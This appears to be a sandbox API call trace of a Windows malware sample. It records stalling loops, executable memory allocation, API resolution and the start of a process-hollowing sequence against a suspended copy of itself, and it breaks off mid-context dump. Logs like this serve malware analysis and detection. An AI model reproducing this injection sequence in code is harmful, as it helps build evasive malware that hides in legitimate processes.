GetThreadLocale () returned 0x409 [0076.079] GetCurrentProcess () returned 0xffffffff [0076.079] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.079] GetSystemDefaultLangID () returned 0x24d0409 [0076.079] GetThreadLocale () returned 0x409 [0076.079] GetCurrentProcess () returned 0xffffffff [0076.079] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.079] GetSystemDefaultLangID () returned 0x24d0409 [0076.079] GetThreadLocale () returned 0x409 [0076.080] GetCurrentProcess () returned 0xffffffff [0076.080] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.080] GetSystemDefaultLangID () returned 0x24d0409 [0076.080] GetThreadLocale () returned 0x409 [0076.080] GetCurrentProcess () returned 0xffffffff [0076.080] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.080] GetSystemDefaultLangID () returned 0x24d0409 [0076.080] GetThreadLocale () returned 0x409 [0076.080] GetCurrentProcess () returned 0xffffffff [0076.080] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.080] GetSystemDefaultLangID () returned 0x24d0409 [0076.080] GetThreadLocale () returned 0x409 [0076.080] GetCurrentProcess () returned 0xffffffff [0076.080] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.080] GetSystemDefaultLangID () returned 0x24d0409 [0076.080] GetThreadLocale () returned 0x409 [0076.080] GetCurrentProcess () returned 0xffffffff [0076.080] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.080] GetSystemDefaultLangID () returned 0x24d0409 [0076.080] GetThreadLocale () returned 0x409 [0076.080] GetCurrentProcess () returned 0xffffffff [0076.080] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.080] GetSystemDefaultLangID () returned 0x24d0409 [0076.080] GetThreadLocale () returned 0x409 [0076.080] GetCurrentProcess () returned 0xffffffff [0076.080] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.080] GetSystemDefaultLangID () returned 0x24d0409 [0076.080] GetThreadLocale () returned 0x409 [0076.080] GetCurrentProcess () returned 0xffffffff [0076.080] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.080] GetSystemDefaultLangID () returned 0x24d0409 [0076.080] GetThreadLocale () returned 0x409 [0076.080] GetCurrentProcess () returned 0xffffffff [0076.080] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.080] GetSystemDefaultLangID () returned 0x24d0409 [0076.081] GetThreadLocale () returned 0x409 [0076.081] GetCurrentProcess () returned 0xffffffff [0076.081] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.081] GetSystemDefaultLangID () returned 0x24d0409 [0076.081] GetThreadLocale () returned 0x409 [0076.081] GetCurrentProcess () returned 0xffffffff [0076.081] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.081] GetSystemDefaultLangID () returned 0x24d0409 [0076.081] GetThreadLocale () returned 0x409 [0076.081] GetCurrentProcess () returned 0xffffffff [0076.081] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.081] GetSystemDefaultLangID () returned 0x24d0409 [0076.081] GetThreadLocale () returned 0x409 [0076.081] GetCurrentProcess () returned 0xffffffff [0076.081] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.081] GetSystemDefaultLangID () returned 0x24d0409 [0076.081] GetThreadLocale () returned 0x409 [0076.081] GetCurrentProcess () returned 0xffffffff [0076.081] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.081] GetSystemDefaultLangID () returned 0x24d0409 [0076.081] GetThreadLocale () returned 0x409 [0076.081] GetCurrentProcess () returned 0xffffffff [0076.081] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.081] GetSystemDefaultLangID () returned 0x24d0409 [0076.082] GetThreadLocale () returned 0x409 [0076.082] GetCurrentProcess () returned 0xffffffff [0076.082] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.082] GetSystemDefaultLangID () returned 0x24d0409 [0076.082] GetThreadLocale () returned 0x409 [0076.082] GetCurrentProcess () returned 0xffffffff [0076.082] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.082] GetSystemDefaultLangID () returned 0x24d0409 [0076.082] GetThreadLocale () returned 0x409 [0076.082] GetCurrentProcess () returned 0xffffffff [0076.082] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.082] GetSystemDefaultLangID () returned 0x24d0409 [0076.082] GetThreadLocale () returned 0x409 [0076.082] GetCurrentProcess () returned 0xffffffff [0076.082] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.082] GetSystemDefaultLangID () returned 0x24d0409 [0076.082] GetThreadLocale () returned 0x409 [0076.082] GetCurrentProcess () returned 0xffffffff [0076.082] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.082] GetSystemDefaultLangID () returned 0x24d0409 [0076.082] GetThreadLocale () returned 0x409 [0076.082] GetCurrentProcess () returned 0xffffffff [0076.082] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.082] GetSystemDefaultLangID () returned 0x24d0409 [0076.082] GetThreadLocale () returned 0x409 [0076.082] GetCurrentProcess () returned 0xffffffff [0076.082] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.082] GetSystemDefaultLangID () returned 0x24d0409 [0076.082] GetThreadLocale () returned 0x409 [0076.082] GetCurrentProcess () returned 0xffffffff [0076.082] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.083] GetSystemDefaultLangID () returned 0x24d0409 [0076.083] GetThreadLocale () returned 0x409 [0076.083] GetCurrentProcess () returned 0xffffffff [0076.083] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.083] GetSystemDefaultLangID () returned 0x24d0409 [0076.083] GetThreadLocale () returned 0x409 [0076.083] GetCurrentProcess () returned 0xffffffff [0076.083] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.083] GetSystemDefaultLangID () returned 0x24d0409 [0076.083] GetThreadLocale () returned 0x409 [0076.083] GetCurrentProcess () returned 0xffffffff [0076.083] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.083] GetSystemDefaultLangID () returned 0x24d0409 [0076.083] GetThreadLocale () returned 0x409 [0076.083] GetCurrentProcess () returned 0xffffffff [0076.083] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.083] GetSystemDefaultLangID () returned 0x24d0409 [0076.086] GetThreadLocale () returned 0x409 [0076.086] GetCurrentProcess () returned 0xffffffff [0076.086] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.086] GetSystemDefaultLangID () returned 0x24d0409 [0076.086] GetThreadLocale () returned 0x409 [0076.086] GetCurrentProcess () returned 0xffffffff [0076.086] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.086] GetSystemDefaultLangID () returned 0x24d0409 [0076.086] GetThreadLocale () returned 0x409 [0076.086] GetCurrentProcess () returned 0xffffffff [0076.087] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.087] GetSystemDefaultLangID () returned 0x24d0409 [0076.087] GetThreadLocale () returned 0x409 [0076.087] GetCurrentProcess () returned 0xffffffff [0076.087] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.087] GetSystemDefaultLangID () returned 0x24d0409 [0076.087] GetThreadLocale () returned 0x409 [0076.087] GetCurrentProcess () returned 0xffffffff [0076.087] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.087] GetSystemDefaultLangID () returned 0x24d0409 [0076.087] GetThreadLocale () returned 0x409 [0076.087] GetCurrentProcess () returned 0xffffffff [0076.087] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.087] GetSystemDefaultLangID () returned 0x24d0409 [0076.087] GetThreadLocale () returned 0x409 [0076.087] GetCurrentProcess () returned 0xffffffff [0076.087] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.087] GetSystemDefaultLangID () returned 0x24d0409 [0076.087] GetThreadLocale () returned 0x409 [0076.087] GetCurrentProcess () returned 0xffffffff [0076.087] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.087] GetSystemDefaultLangID () returned 0x24d0409 [0076.087] GetThreadLocale () returned 0x409 [0076.087] GetCurrentProcess () returned 0xffffffff [0076.087] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.087] GetSystemDefaultLangID () returned 0x24d0409 [0076.087] GetThreadLocale () returned 0x409 [0076.087] GetCurrentProcess () returned 0xffffffff [0076.087] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.087] GetSystemDefaultLangID () returned 0x24d0409 [0076.087] GetThreadLocale () returned 0x409 [0076.087] GetCurrentProcess () returned 0xffffffff [0076.087] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.088] GetSystemDefaultLangID () returned 0x24d0409 [0076.088] GetThreadLocale () returned 0x409 [0076.088] GetCurrentProcess () returned 0xffffffff [0076.088] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.088] GetSystemDefaultLangID () returned 0x24d0409 [0076.088] GetThreadLocale () returned 0x409 [0076.088] GetCurrentProcess () returned 0xffffffff [0076.088] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.088] GetSystemDefaultLangID () returned 0x24d0409 [0076.088] GetThreadLocale () returned 0x409 [0076.088] GetCurrentProcess () returned 0xffffffff [0076.088] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.088] GetSystemDefaultLangID () returned 0x24d0409 [0076.088] GetThreadLocale () returned 0x409 [0076.088] GetCurrentProcess () returned 0xffffffff [0076.088] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.088] GetSystemDefaultLangID () returned 0x24d0409 [0076.088] GetThreadLocale () returned 0x409 [0076.088] GetCurrentProcess () returned 0xffffffff [0076.088] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.088] GetSystemDefaultLangID () returned 0x24d0409 [0076.088] GetThreadLocale () returned 0x409 [0076.088] GetCurrentProcess () returned 0xffffffff [0076.088] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.088] GetSystemDefaultLangID () returned 0x24d0409 [0076.088] GetThreadLocale () returned 0x409 [0076.088] GetCurrentProcess () returned 0xffffffff [0076.088] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.088] GetSystemDefaultLangID () returned 0x24d0409 [0076.088] GetThreadLocale () returned 0x409 [0076.088] GetCurrentProcess () returned 0xffffffff [0076.088] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.088] GetSystemDefaultLangID () returned 0x24d0409 [0076.088] GetThreadLocale () returned 0x409 [0076.088] GetCurrentProcess () returned 0xffffffff [0076.089] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.089] GetSystemDefaultLangID () returned 0x24d0409 [0076.089] GetThreadLocale () returned 0x409 [0076.089] GetCurrentProcess () returned 0xffffffff [0076.089] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.089] GetSystemDefaultLangID () returned 0x24d0409 [0076.089] GetThreadLocale () returned 0x409 [0076.089] GetCurrentProcess () returned 0xffffffff [0076.089] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.089] GetSystemDefaultLangID () returned 0x24d0409 [0076.089] GetThreadLocale () returned 0x409 [0076.089] GetCurrentProcess () returned 0xffffffff [0076.089] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.089] GetSystemDefaultLangID () returned 0x24d0409 [0076.089] GetThreadLocale () returned 0x409 [0076.089] GetCurrentProcess () returned 0xffffffff [0076.089] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.089] GetSystemDefaultLangID () returned 0x24d0409 [0076.089] GetThreadLocale () returned 0x409 [0076.089] GetCurrentProcess () returned 0xffffffff [0076.089] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.089] GetSystemDefaultLangID () returned 0x24d0409 [0076.089] GetThreadLocale () returned 0x409 [0076.089] GetCurrentProcess () returned 0xffffffff [0076.089] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.089] GetSystemDefaultLangID () returned 0x24d0409 [0076.089] GetThreadLocale () returned 0x409 [0076.089] GetCurrentProcess () returned 0xffffffff [0076.089] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.089] GetSystemDefaultLangID () returned 0x24d0409 [0076.089] GetThreadLocale () returned 0x409 [0076.089] GetCurrentProcess () returned 0xffffffff [0076.089] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.089] GetSystemDefaultLangID () returned 0x24d0409 [0076.090] GetThreadLocale () returned 0x409 [0076.090] GetCurrentProcess () returned 0xffffffff [0076.090] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.090] GetSystemDefaultLangID () returned 0x24d0409 [0076.090] GetThreadLocale () returned 0x409 [0076.090] GetCurrentProcess () returned 0xffffffff [0076.090] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.090] GetSystemDefaultLangID () returned 0x24d0409 [0076.090] GetThreadLocale () returned 0x409 [0076.090] GetCurrentProcess () returned 0xffffffff [0076.090] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.090] GetSystemDefaultLangID () returned 0x24d0409 [0076.090] GetThreadLocale () returned 0x409 [0076.090] GetCurrentProcess () returned 0xffffffff [0076.090] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.090] GetSystemDefaultLangID () returned 0x24d0409 [0076.090] GetThreadLocale () returned 0x409 [0076.090] GetCurrentProcess () returned 0xffffffff [0076.090] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.090] GetSystemDefaultLangID () returned 0x24d0409 [0076.090] GetThreadLocale () returned 0x409 [0076.090] GetCurrentProcess () returned 0xffffffff [0076.090] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.090] GetSystemDefaultLangID () returned 0x24d0409 [0076.090] GetThreadLocale () returned 0x409 [0076.090] GetCurrentProcess () returned 0xffffffff [0076.090] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.090] GetSystemDefaultLangID () returned 0x24d0409 [0076.090] GetThreadLocale () returned 0x409 [0076.090] GetCurrentProcess () returned 0xffffffff [0076.090] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.090] GetSystemDefaultLangID () returned 0x24d0409 [0076.090] GetThreadLocale () returned 0x409 [0076.091] GetCurrentProcess () returned 0xffffffff [0076.091] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.091] GetSystemDefaultLangID () returned 0x24d0409 [0076.091] GetThreadLocale () returned 0x409 [0076.091] GetCurrentProcess () returned 0xffffffff [0076.091] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.091] GetSystemDefaultLangID () returned 0x24d0409 [0076.091] GetThreadLocale () returned 0x409 [0076.091] GetCurrentProcess () returned 0xffffffff [0076.091] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.091] GetSystemDefaultLangID () returned 0x24d0409 [0076.091] GetThreadLocale () returned 0x409 [0076.091] GetCurrentProcess () returned 0xffffffff [0076.091] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.091] GetSystemDefaultLangID () returned 0x24d0409 [0076.091] GetThreadLocale () returned 0x409 [0076.091] GetCurrentProcess () returned 0xffffffff [0076.091] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.091] GetSystemDefaultLangID () returned 0x24d0409 [0076.091] GetThreadLocale () returned 0x409 [0076.091] GetCurrentProcess () returned 0xffffffff [0076.091] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.091] GetSystemDefaultLangID () returned 0x24d0409 [0076.091] GetThreadLocale () returned 0x409 [0076.952] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76720000 [0076.953] LocalAlloc (uFlags=0x0, uBytes=0xf748) returned 0x24e1f48 [0076.954] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76720000 [0076.954] GetProcAddress (hModule=0x76720000, lpProcName="VirtualProtect") returned 0x76737a50 [0076.954] VirtualProtect (in: lpAddress=0x24e1f48, dwSize=0xf748, flNewProtect=0x40, lpflOldProtect=0x19e80c | out: lpflOldProtect=0x19e80c*=0x4) returned 1 [0076.985] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76720000 [0076.986] GetProcAddress (hModule=0x76720000, lpProcName="GlobalAlloc") returned 0x76739950 [0076.986] GetProcAddress (hModule=0x76720000, lpProcName="GetLastError") returned 0x76733870 [0076.986] GetProcAddress (hModule=0x76720000, lpProcName="Sleep") returned 0x76737990 [0076.986] GetProcAddress (hModule=0x76720000, lpProcName="VirtualAlloc") returned 0x76737810 [0076.986] GetProcAddress (hModule=0x76720000, lpProcName="CreateToolhelp32Snapshot") returned 0x76747b50 [0076.986] GetProcAddress (hModule=0x76720000, lpProcName="Module32First") returned 0x767644b0 [0076.986] GetProcAddress (hModule=0x76720000, lpProcName="CloseHandle") returned 0x76746630 [0076.986] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0x0) returned 0xac [0077.046] Module32First (hSnapshot=0xac, lpme=0x19f1cc) returned 1 [0077.047] VirtualAlloc (lpAddress=0x0, dwSize=0x89a0, flAllocationType=0x1000, flProtect=0x40) returned 0x1d0000 [0077.049] LoadLibraryA (lpLibFileName="user32") returned 0x743d0000 [0077.050] GetProcAddress (hModule=0x743d0000, lpProcName="MessageBoxA") returned 0x7444fec0 [0077.050] GetProcAddress (hModule=0x743d0000, lpProcName="GetMessageExtraInfo") returned 0x74403690 [0077.050] LoadLibraryA (lpLibFileName="kernel32") returned 0x76720000 [0077.050] GetProcAddress (hModule=0x76720000, lpProcName="WinExec") returned 0x7675ff70 [0077.050] GetProcAddress (hModule=0x76720000, lpProcName="CreateFileA") returned 0x76746880 [0077.050] GetProcAddress (hModule=0x76720000, lpProcName="WriteFile") returned 0x76746ca0 [0077.050] GetProcAddress (hModule=0x76720000, lpProcName="CloseHandle") returned 0x76746630 [0077.050] GetProcAddress (hModule=0x76720000, lpProcName="CreateProcessA") returned 0x76760750 [0077.050] GetProcAddress (hModule=0x76720000, lpProcName="GetThreadContext") returned 0x7673ec60 [0077.050] GetProcAddress (hModule=0x76720000, lpProcName="VirtualAlloc") returned 0x76737810 [0077.050] GetProcAddress (hModule=0x76720000, lpProcName="VirtualAllocEx") returned 0x76762730 [0077.050] GetProcAddress (hModule=0x76720000, lpProcName="VirtualFree") returned 0x76737600 [0077.050] GetProcAddress (hModule=0x76720000, lpProcName="ReadProcessMemory") returned 0x76761c80 [0077.050] GetProcAddress (hModule=0x76720000, lpProcName="WriteProcessMemory") returned 0x76762850 [0077.050] GetProcAddress (hModule=0x76720000, lpProcName="SetThreadContext") returned 0x76762490 [0077.051] GetProcAddress (hModule=0x76720000, lpProcName="ResumeThread") returned 0x7673a800 [0077.051] GetProcAddress (hModule=0x76720000, lpProcName="WaitForSingleObject") returned 0x76746820 [0077.051] GetProcAddress (hModule=0x76720000, lpProcName="GetModuleFileNameA") returned 0x7673a720 [0077.051] GetProcAddress (hModule=0x76720000, lpProcName="GetCommandLineA") returned 0x7673ab60 [0077.051] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x771d0000 [0077.051] GetProcAddress (hModule=0x771d0000, lpProcName="NtUnmapViewOfSection") returned 0x77246f40 [0077.051] GetProcAddress (hModule=0x771d0000, lpProcName="NtWriteVirtualMemory") returned 0x77247040 [0077.051] GetProcAddress (hModule=0x743d0000, lpProcName="RegisterClassExA") returned 0x74404e90 [0077.051] GetProcAddress (hModule=0x743d0000, lpProcName="CreateWindowExA") returned 0x74406f30 [0077.051] GetProcAddress (hModule=0x743d0000, lpProcName="PostMessageA") returned 0x743ff0e0 [0077.051] GetProcAddress (hModule=0x743d0000, lpProcName="GetMessageA") returned 0x743fe130 [0077.051] GetProcAddress (hModule=0x743d0000, lpProcName="DefWindowProcA") returned 0x7725aed0 [0077.052] GetProcAddress (hModule=0x76720000, lpProcName="GetFileAttributesA") returned 0x76746a20 [0077.052] GetProcAddress (hModule=0x76720000, lpProcName="GetStartupInfoA") returned 0x76739c10 [0077.052] GetProcAddress (hModule=0x76720000, lpProcName="VirtualProtectEx") returned 0x76762790 [0077.052] GetProcAddress (hModule=0x76720000, lpProcName="ExitProcess") returned 0x76747b30 [0077.052] GetFileAttributesA (lpFileName="apfHQ" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\apfhq")) returned 0xffffffff [0077.053] GetFileAttributesA (lpFileName="apfHQ" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\apfhq")) returned 0xffffffff [0077.053] GetFileAttributesA (lpFileName="apfHQ" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\apfhq")) returned 0xffffffff [0077.053] RegisterClassExA (param_1=0x19ee88) returned 0xc1e1 [0077.053] CreateWindowExA (dwExStyle=0x200, lpClassName="saodkfnosa9uin", lpWindowName="mfoaskdfnoa", dwStyle=0xcf0000, X=-2147483648, Y=-2147483648, nWidth=1000, nHeight=1000, hWndParent=0x0, hMenu=0x0, hInstance=0x0, lpParam=0x0) returned 0x40306 [0083.035] PostMessageA (hWnd=0x40306, Msg=0x400, wParam=0x64, lParam=0x1f4) returned 1 [0083.036] GetMessageA (in: lpMsg=0x19eeb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19eeb8) returned 1 [0083.036] GetMessageA (in: lpMsg=0x19eeb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19eeb8) returned 1 [0083.036] VirtualAlloc (lpAddress=0x0, dwSize=0x2800, flAllocationType=0x1000, flProtect=0x4) returned 0x24b0000 [0083.036] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x24b0000, nSize=0x2800 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\19e29cc8b874c3dd5fa4b724fb6d5d51db0b7c2fd4e954bb7b1dda228b2225fb.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\19e29cc8b874c3dd5fa4b724fb6d5d51db0b7c2fd4e954bb7b1dda228b2225fb.exe")) returned 0x62 [0083.037] GetStartupInfoA (in: lpStartupInfo=0x19eddc | out: lpStartupInfo=0x19eddc*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\19e29cc8b874c3dd5fa4b724fb6d5d51db0b7c2fd4e954bb7b1dda228b2225fb.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0083.037] GetCommandLineA () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\19e29cc8b874c3dd5fa4b724fb6d5d51db0b7c2fd4e954bb7b1dda228b2225fb.exe\" " [0083.037] CreateProcessA (in: lpApplicationName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\19e29cc8b874c3dd5fa4b724fb6d5d51db0b7c2fd4e954bb7b1dda228b2225fb.exe", lpCommandLine="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\19e29cc8b874c3dd5fa4b724fb6d5d51db0b7c2fd4e954bb7b1dda228b2225fb.exe\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000004, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x19eddc*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\19e29cc8b874c3dd5fa4b724fb6d5d51db0b7c2fd4e954bb7b1dda228b2225fb.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0), lpProcessInformation=0x19ee34 | out: lpCommandLine="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\19e29cc8b874c3dd5fa4b724fb6d5d51db0b7c2fd4e954bb7b1dda228b2225fb.exe\" ", lpProcessInformation=0x19ee34*(hProcess=0x110, hThread=0x10c, dwProcessId=0x1370, dwThreadId=0x1374)) returned 1 [0083.068] VirtualFree (lpAddress=0x24b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.068] VirtualAlloc (lpAddress=0x0, dwSize=0x4, flAllocationType=0x1000, flProtect=0x4) returned 0x24b0000 [0083.069] GetThreadContext (in: hThread=0x10c, lpContext=0x24b0000 | out: lpContext=0x24b0000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, 